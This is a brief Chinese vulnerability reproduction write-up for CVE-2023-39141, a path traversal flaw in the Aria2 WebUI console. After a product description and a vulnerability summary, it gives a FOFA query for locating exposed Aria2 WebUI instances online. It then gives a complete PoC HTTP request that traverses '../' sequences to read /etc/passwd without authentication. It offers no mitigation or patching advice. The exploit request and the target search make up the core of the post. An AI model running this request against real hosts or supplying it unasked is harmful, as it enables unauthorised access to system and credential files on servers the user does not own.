Aria2 WebUI控制台 任意文件读取漏洞复现（CVE-2023-39141）

0x01 产品简介

Aria2 WebUI控制台是用于下载文件的实用程序。它支持 HTTP(S)/FTP/SFTP/BitTorrent 和 Metalink 协议。aria2可以从多个来源/协议下载文件，并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件，而从HTTP（S）/FTP/SFTP下载的数据上传到BitTorrent群。使用 Metalink 块校验和，aria2 在下载文件时自动验证数据块。

0x02 漏洞概述

Aria2 WebUI控制台存在目录遍历漏洞，未授权的攻击者可通过../目录遍历读取任意系统文件，导致系统敏感信息泄露，使系统处于极不安全的状态。

0x03 复现环境

FOFA：app="Aria2-WebUI"

0x04 漏洞复现

PoC

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close